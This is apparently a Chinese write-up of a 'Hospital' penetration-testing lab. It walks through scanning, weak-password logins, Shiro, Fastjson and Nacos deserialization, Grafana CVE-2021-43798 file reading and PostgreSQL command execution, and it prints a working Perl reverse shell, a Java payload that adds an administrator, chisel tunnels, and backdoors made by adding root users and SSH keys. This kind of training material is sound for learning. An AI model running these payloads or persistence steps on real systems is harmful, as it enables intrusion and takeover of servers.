Hospital Writeup

Creado2025-03-13Actualizado2025-03-14Visitado

外网信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
D:\桌面\信息收集\fscan2>fscan.exe -h 39.99.146.10

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 2.0.0
[*] 扫描类型: all, 目标端口: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880
[*] 开始信息扫描...
[*] 最终有效主机数量: 1
[*] 共解析 218 个有效端口
[+] 端口开放 39.99.146.10:22
[+] 端口开放 39.99.146.10:8080
[+] 存活端口数量: 2
[*] 开始漏洞扫描...
[*] 网站标题 http://39.99.146.10:8080  状态码:302 长度:0      标题:无标题 重定向地址: http://39.99.146.10:8080/login;jsessionid=935B60352AE61077035EC687C20917ED
[*] 网站标题 http://39.99.146.10:8080/login;jsessionid=935B60352AE61077035EC687C20917ED 状态码:200 长度:2005   标题:医疗管理后台
[!] 扫描错误 39.99.146.10:22 - 扫描总时间超时: context deadline exceeded
[+] [发现漏洞] 目标: http://39.99.146.10:8080
  漏洞类型: poc-yaml-spring-actuator-heapdump-file
  漏洞名称:
  详细信息: %!s(<nil>)
[+] 扫描已完成: 2/2
[*] 扫描结束,耗时: 22.9915811s

医疗管理后台

弱口令admin/admin123进入

此时发现这个是一个存前端的界面;继续对该ip进行信息收集

Spring Boot Heapdump

fscan扫出:poc-yaml-spring-actuator-heapdump-file

下载heapdump;使用JDumpSpider-1.1-SNAPSHOT-full.jar进行分析

Shiro Deserialization

getshell

Vim.basic 提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
find / -user root -perm -4000 -print 2>/dev/null
/usr/bin/vim.basic
/usr/bin/su
/usr/bin/newgrp
/usr/bin/staprun
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/chfn
/usr/bin/stapbpf
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/mount
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device


vim.basic /root/flag/flag01.txt

内网渗透

内网信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
app@web01:/tmp$ ./fscan -h 172.30.12.1/24
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-03-13 11:43:38] [INFO] 暴力破解线程数: 1
[2025-03-13 11:43:38] [INFO] 开始信息扫描
[2025-03-13 11:43:38] [INFO] CIDR范围: 172.30.12.0-172.30.12.255
[2025-03-13 11:43:38] [INFO] 生成IP范围: 172.30.12.0.%!d(string=172.30.12.255) - %!s(MISSING).%!d(MISSING)
[2025-03-13 11:43:38] [INFO] 解析CIDR 172.30.12.1/24 -> IP范围 172.30.12.0-172.30.12.255
[2025-03-13 11:43:38] [INFO] 最终有效主机数量: 256
[2025-03-13 11:43:39] [INFO] 开始主机扫描
[2025-03-13 11:43:39] [INFO] 正在尝试无监听ICMP探测...
[2025-03-13 11:43:39] [INFO] 当前用户权限不足,无法发送ICMP包
[2025-03-13 11:43:39] [INFO] 切换为PING方式探测...
[2025-03-13 11:43:39] [SUCCESS] 目标 172.30.12.5     存活 (ICMP)
[2025-03-13 11:43:39] [SUCCESS] 目标 172.30.12.6     存活 (ICMP)
[2025-03-13 11:43:43] [SUCCESS] 目标 172.30.12.236   存活 (ICMP)
[2025-03-13 11:43:45] [INFO] 存活主机数量: 3
[2025-03-13 11:43:45] [INFO] 有效端口数量: 233
[2025-03-13 11:43:45] [SUCCESS] 端口开放 172.30.12.6:135
[2025-03-13 11:43:45] [SUCCESS] 端口开放 172.30.12.6:139
[2025-03-13 11:43:45] [SUCCESS] 端口开放 172.30.12.6:445
[2025-03-13 11:43:45] [SUCCESS] 端口开放 172.30.12.236:22
[2025-03-13 11:43:45] [SUCCESS] 端口开放 172.30.12.5:22
[2025-03-13 11:43:45] [SUCCESS] 端口开放 172.30.12.236:8009
[2025-03-13 11:43:45] [SUCCESS] 端口开放 172.30.12.5:8080
[2025-03-13 11:43:45] [SUCCESS] 端口开放 172.30.12.236:8080
[2025-03-13 11:43:45] [SUCCESS] 端口开放 172.30.12.6:8848
[2025-03-13 11:43:45] [SUCCESS] 服务识别 172.30.12.236:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2025-03-13 11:43:45] [SUCCESS] 服务识别 172.30.12.5:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2025-03-13 11:43:50] [SUCCESS] 服务识别 172.30.12.6:139 =>  Banner:[.]
[2025-03-13 11:43:50] [SUCCESS] 服务识别 172.30.12.6:445 => 
[2025-03-13 11:43:50] [SUCCESS] 服务识别 172.30.12.236:8009 => 
[2025-03-13 11:43:50] [SUCCESS] 服务识别 172.30.12.5:8080 => [http]
[2025-03-13 11:43:51] [SUCCESS] 服务识别 172.30.12.236:8080 => [http]
[2025-03-13 11:43:55] [SUCCESS] 服务识别 172.30.12.6:8848 => [http]
[2025-03-13 11:44:50] [SUCCESS] 服务识别 172.30.12.6:135 => 
[2025-03-13 11:44:50] [INFO] 存活端口数量: 9
[2025-03-13 11:44:50] [INFO] 开始漏洞扫描
[2025-03-13 11:44:50] [INFO] 加载的插件: findnet, ms17010, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-03-13 11:44:50] [SUCCESS] NetInfo 扫描结果
目标主机: 172.30.12.6
主机名: Server02
发现的网络接口:
   IPv4地址:
      └─ 172.30.12.6
[2025-03-13 11:44:50] [SUCCESS] NetBios 172.30.12.6     WORKGROUP\SERVER02            
[2025-03-13 11:44:50] [SUCCESS] 网站标题 http://172.30.12.5:8080   状态码:302 长度:0      标题:无标题 重定向地址: http://172.30.12.5:8080/login;jsessionid=77899D13F4306070E6BD10E1C48406CB
[2025-03-13 11:44:50] [SUCCESS] 网站标题 http://172.30.12.236:8080 状态码:200 长度:3964   标题:医院后台管理平台
[2025-03-13 11:44:51] [SUCCESS] 网站标题 http://172.30.12.5:8080/login;jsessionid=77899D13F4306070E6BD10E1C48406CB 状态码:200 长度:2005   标题:医疗管理后台
[2025-03-13 11:44:51] [SUCCESS] 网站标题 http://172.30.12.6:8848   状态码:404 长度:431    标题:HTTP Status 404 – Not Found
[2025-03-13 11:44:51] [SUCCESS] 目标: http://172.30.12.6:8848
  漏洞类型: poc-yaml-alibaba-nacos
  漏洞名称: 
  详细信息:
        author:AgeloVito
        links:https://blog.csdn.net/caiqiiqi/article/details/112005424
[2025-03-13 11:44:52] [SUCCESS] 目标: http://172.30.12.6:8848
  漏洞类型: poc-yaml-alibaba-nacos-v1-auth-bypass
  漏洞名称: 
  详细信息:
        author:kmahyyg(https://github.com/kmahyyg)
        links:https://github.com/alibaba/nacos/issues/4593
[2025-03-13 11:44:52] [SUCCESS] 目标: http://172.30.12.5:8080
  漏洞类型: poc-yaml-spring-actuator-heapdump-file
  漏洞名称: 
  详细信息:
        author:AgeloVito
        links:https://www.cnblogs.com/wyb628/p/8567610.html
[2025-03-13 11:51:05] [SUCCESS] 扫描已完成: 16/16

Nacos

弱口令nacos/nacos进入

获取到的配置文件内容如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
server:
  port: 8080
  servlet:
    context-path: /hello

spring:
  application:
    name: db-config
  cloud:
    nacos:
      discovery:
        server-addr: 127.0.0.1:8848
      config:
        server-addr: 127.0.0.1:8848
        file-extension: yaml
        namespace: dev
        group: DEFAULT_GROUP
        data-id: db-config.yaml
  datasource:
    mysql:
      url: jdbc:mysql://localhost:3306/test?useSSL=false&serverTimezone=UTC&allowPublicKeyRetrieval=true
      username: root
      password: P@ssWord!!!
  redis:
    host: localhost
    port: 6379

management:
  endpoints:
    web:
      exposure:
        include: '*'

敏感信息:mysql:root:P@ssWord!!!

Nacos Client Yaml Deserialization

使用:https://github.com/charonlight/NacosExploitGUI/tree/main/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E7%8E%AF%E5%A2%83/nacos-client_yaml_deserialize/yaml-payload/src/artsploit

只需要修改 AwesomeScriptEngineFactory.java 文件中的内容即可,此处建议直接添加个管理员账户:

1
2
3
4
5
6
7
8
public AwesomeScriptEngineFactory() {
    try {
        Runtime.getRuntime().exec("net user hey 626620a /add");
        Runtime.getRuntime().exec("net localgroup administrators hey /add");
    } catch (IOException e) {
        e.printStackTrace();
    }
}

现成的打包bat,挺好,打包后生成yaml-payload.jar。

将恶意的 yaml-payload.jar 包上传至 web01 主机上,并开启一个 http 服务:

1
2
3
root@web01:~# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
172.30.12.6 - - [29/Dec/2023 14:52:42] "GET /yaml-payload.jar HTTP/1.1" 200 -

使用 charonlight/NacosExploitGUI 让 nacos 服务器去从远程服务器加载恶意的 yaml-payload.jar 包:

Rdp上去

医院后台管理平台

经过弱口令,后台爆破,漏洞扫描后无果;进行抓包检测

发现此时数据以json进行传输

且指纹识别工具识别出java环境;很容易想到fastjson

Fastjson Deserialization

检测版本

漏洞检测

注入内存马

受控机器(web2)信息收集

双网卡机器

二级隧道搭建

因为上面的肉鸡(web2)是双网卡机器,那么此时我们就要利用到多级隧道的搭建技术。

1
VPS -> 外网靶机 ->内网机器2 -> 内网机器3

chisel多级隧道搭建

外网靶机搭建服务端

1
./chisel server -p 7001 --reverse

双网卡机器上面搭建客户端

此时先将双网卡机器的shell反弹到入口机器上(有交互式终端)

1
./chisel client 172.30.12.5:7002 R:0.0.0.0:7000:socks

本地Proxifer搭建代理链

proxychains.conf

此时的整个多级代理如下:

1
外网->47.xx.xx.xx:6666(My_VPS) -> 172.30.12.5:7000 (外网靶机) -> 172.30.54.12(双网卡机器)

内网信息收集2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
./fscan -h 172.30.54.1/24
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-03-13 15:05:20] [INFO] 暴力破解线程数: 1
[2025-03-13 15:05:20] [INFO] 开始信息扫描
[2025-03-13 15:05:20] [INFO] CIDR范围: 172.30.54.0-172.30.54.255
[2025-03-13 15:05:20] [INFO] 生成IP范围: 172.30.54.0.%!d(string=172.30.54.255) - %!s(MISSING).%!d(MISSING)
[2025-03-13 15:05:20] [INFO] 解析CIDR 172.30.54.1/24 -> IP范围 172.30.54.0-172.30.54.255
[2025-03-13 15:05:20] [INFO] 最终有效主机数量: 256
[2025-03-13 15:05:20] [INFO] 开始主机扫描
[2025-03-13 15:05:20] [SUCCESS] 目标 172.30.54.179   存活 (ICMP)
[2025-03-13 15:05:20] [SUCCESS] 目标 172.30.54.12    存活 (ICMP)
[2025-03-13 15:05:23] [INFO] 存活主机数量: 2
[2025-03-13 15:05:23] [INFO] 有效端口数量: 233
[2025-03-13 15:05:23] [SUCCESS] 端口开放 172.30.54.179:22
[2025-03-13 15:05:23] [SUCCESS] 端口开放 172.30.54.12:22
[2025-03-13 15:05:23] [SUCCESS] 端口开放 172.30.54.12:5432
[2025-03-13 15:05:23] [SUCCESS] 端口开放 172.30.54.12:3000
[2025-03-13 15:05:23] [SUCCESS] 端口开放 172.30.54.179:8009
[2025-03-13 15:05:23] [SUCCESS] 端口开放 172.30.54.179:8080
[2025-03-13 15:05:23] [SUCCESS] 服务识别 172.30.54.179:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2025-03-13 15:05:23] [SUCCESS] 服务识别 172.30.54.12:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2025-03-13 15:05:28] [SUCCESS] 服务识别 172.30.54.12:5432 => 
[2025-03-13 15:05:28] [SUCCESS] 服务识别 172.30.54.12:3000 => [http] Banner:[HTTP/1.1 400 Bad Request.Content-Type: text/plain; charset=utf-8.Connection: close.400 Bad Request]
[2025-03-13 15:05:29] [SUCCESS] 服务识别 172.30.54.179:8009 => 
[2025-03-13 15:05:29] [SUCCESS] 服务识别 172.30.54.179:8080 => [http]
[2025-03-13 15:05:29] [INFO] 存活端口数量: 6
[2025-03-13 15:05:29] [INFO] 开始漏洞扫描
[2025-03-13 15:05:29] [INFO] 加载的插件: postgres, ssh, webpoc, webtitle
[2025-03-13 15:05:29] [SUCCESS] 网站标题 http://172.30.54.179:8080 状态码:200 长度:3964   标题:医院后台管理平台
[2025-03-13 15:05:29] [SUCCESS] 网站标题 http://172.30.54.12:3000  状态码:302 长度:29     标题:无标题 重定向地址: http://172.30.54.12:3000/login
[2025-03-13 15:05:29] [SUCCESS] 网站标题 http://172.30.54.12:3000/login 状态码:200 长度:27909  标题:Grafana

Grafana 数据可视化平台

Grafana Unauthorized Arbitrary File Reading (CVE-2021-43798)

需要利用 CVE-2021-43798 漏洞获取到数据库文件(/var/lib/grafana/grafana.db)以及存在解密密钥的配置文件(/etc/grafana/grafana.ini),然后进行解密。

使用 A-D-Team/grafanaExp 可以一键利用漏洞解密输出 data_souce 信息:

1
2
3
4
5
6
root@web03:~# ./grafanaExp_linux_amd64 exp -u http://172.30.54.12:3000
2023/12/29 17:41:34 Target vulnerable has plugin [alertlist]
2023/12/29 17:41:34 Got secret_key [SW2YcwTIb9zpOOhoPsMm]
2023/12/29 17:41:34 There is [0] records in db.
2023/12/29 17:41:34 type:[postgres]     name:[PostgreSQL]               url:[localhost:5432]    user:[postgres] password[Postgres@123]database:[postgres]      basic_auth_user:[]      basic_auth_password:[]
2023/12/29 17:41:34 All Done, have nice day!

PostgreSQL

1
2
proxychains -q psql -h 172.30.54.12 -U postgres -W
Postgres@123

PostgreSQL渗透

参考文章:https://tttang.com/archive/1547/#toc_0x06-postgresql

psql创建函数执行命令
1
CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
反弹shell
1
select system('perl -e \'use Socket;$i="172.30.54.179";$p=4443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'');

进入交互式终端:

1
python3 -c 'import pty;pty.spawn("/bin/bash")'
PostgreSQL提权
1
2
3
sudo /usr/local/postgresql/bin/psql
\?
!/bin/bash

tips

这个靶场跟以往的不同,没有涉及到域的渗透;而是多了一个双网卡机器下的多层代理;也符合现在攻防演习下各个靶标的现实情况,都说现在的域是可遇不可求的情况。整体难度来说不难,最后在PostgersSql卡了好久,没有遇到这种数据库渗透的现实情况。针对于多网卡机器,如果是Windows下,我们最好直接Rdp上去,这样对后续的shell的交互也会较为方便;而本次基本都是Linux机器,在我的打法下基本是将双网卡机器的shell反弹至入口点的外网靶机;这样子有个坏处就是shell的交互没有那么的方便并且感觉很笨重,在后续的复盘中我想我们可以直接通过改机器密码的操作或者添加root用户又或者是写公钥获得root权限的方式来接管肉鸡,直接使用ssh接管双网卡机器,这样子也对我们后渗透中的shell交互有一定的便捷性。

写公钥

1
2
3
4
5
6
7
8
#自己的机器上
ssh-keygen -t rsa -b 4096
cat ~/.ssh/id_rsa.pub
#弹的shell
echo "~/.ssh/id_rsa.pub的内容" > /root/.ssh/authorized_keyschmod 600 /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys

ssh -i ~/.ssh/id_rsa root@39.99.140.174

添加root用户

1
2
3
4
5
6
7
openssl passwd -1 -salt test 1234    //生成密码
$1$test$So8QlDklBBy90T3QcEYWU/      //得到
test:$1$test$So8QlDklBBy90T3QcEYWU/:0:0:/root:/bin/bash      //构造好

写进/etc/passwd
wq!强制保存后
su test切换用户

改密码

1
2
passwd root
proxychains4 ssh root@172.30.12.236